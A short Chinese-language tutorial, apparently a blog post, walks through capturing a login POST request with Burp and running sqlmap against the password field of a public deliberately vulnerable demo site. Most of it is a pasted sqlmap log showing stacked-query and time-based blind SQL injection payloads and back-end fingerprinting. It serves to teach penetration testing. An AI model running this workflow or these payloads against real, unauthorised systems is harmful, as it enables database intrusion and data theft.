1. 瀏覽器打開目標地址 http://testasp.vulnweb.com/Login.asp
2. 配置burp代理(127.0.0.1:8080)以攔截請求
3. 點擊login表單的submit按鈕
4. 如下圖,這時候Burp會攔截到了我們的登錄POST請求
5. 把這個post請求復制為txt, 我這命名為search-test.txt 然后把它放至sqlmap目錄下
6. 運行sqlmap並使用如下命令:./sqlmap.py -r search-test.txt -p tfUPass,這里參數 -r 是讓sqlmap加載我們的post請求rsearch-test.txt,而-p 大家應該比較熟悉,指定注入用的參數。
./sqlmap.py -r search-test.txt -p tfUPass sqlmap/0.9 - automatic SQL injection and database takeover tool http://sqlmap.sourceforge.net [*] starting at: 13:26:52 [13:26:52] [INFO] parsing HTTP request from 'search-test.txt' [13:26:52] [WARNING] the testable parameter 'tfUPass' you provided is not into the GET [13:26:52] [WARNING] the testable parameter 'tfUPass' you provided is not into the Cookie [13:26:52] [INFO] using '/home/testuser/sqlmap/output/testasp.vulnweb.com/session' as session file [13:26:52] [INFO] resuming injection data from session file [13:26:52] [WARNING] there is an injection in POST parameter 'tfUName' but you did not provided it this time [13:26:52] [INFO] testing connection to the target url [13:26:53] [INFO] testing if the url is stable, wait a few seconds [13:26:55] [INFO] url is stable [13:26:55] [WARNING] heuristic test shows that POST parameter 'tfUPass' might not be injectable [13:26:55] [INFO] testing sql injection on POST parameter 'tfUPass' [13:26:55] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' [13:27:02] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' [13:27:05] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' [13:27:07] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' [13:27:10] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' [13:27:12] [INFO] testing 'MySQL > 5.0.11 stacked queries' [13:27:14] [INFO] testing 'PostgreSQL > 8.1 stacked queries' [13:27:17] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries' [13:27:30] [INFO] POST parameter 'tfUPass' is 'Microsoft SQL Server/Sybase stacked queries' injectable [13:27:30] [INFO] testing 'MySQL > 5.0.11 AND time-based blind' [13:27:31] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' [13:27:31] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' [13:27:42] [INFO] POST parameter 'tfUPass' is 'Microsoft SQL Server/Sybase time-based blind' injectable [13:27:42] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' [13:27:48] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' [13:27:48] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS sqlmap got a 302 redirect to /Search.asp - What target address do you want to use from now on? http://testasp.vulnweb.com:80/Login.asp (default) or provide another target address based also on the redirection got from the application > [13:27:58] [INFO] target url appears to be UNION injectable with 2 columns POST parameter 'tfUPass' is vulnerable. Do you want to keep testing the others? [y/N] N sqlmap identified the following injection points with a total of 68 HTTP(s) requests: --- Place: POST Parameter: tfUPass Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: tfUName=test&tfUPass=test'; WAITFOR DELAY '0:0:5';-- AND 'mPfC'='mPfC Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: tfUName=test&tfUPass=test' WAITFOR DELAY '0:0:5'-- AND 'wpkc'='wpkc --- [13:28:08] [INFO] testing MySQL [13:28:09] [WARNING] the back-end DBMS is not MySQL [13:28:09] [INFO] testing Oracle [13:28:10] [WARNING] the back-end DBMS is not Oracle [13:28:10] [INFO] testing PostgreSQL [13:28:10] [WARNING] the back-end DBMS is not PostgreSQL [13:28:10] [INFO] testing Microsoft SQL Server [13:28:16] [INFO] confirming Microsoft SQL Server [13:28:28] [INFO] the back-end DBMS is Microsoft SQL Server web server operating system: Windows 2003 web application technology: ASP.NET, Microsoft IIS 6.0 back-end DBMS: Microsoft SQL Server 2005 [13:28:28] [WARNING] HTTP error codes detected during testing: 500 (Internal Server Error) - 42 times [13:28:28] [INFO] Fetched data logged to text files under '/home/testuser/sqlmap/output/testasp.vulnweb.com'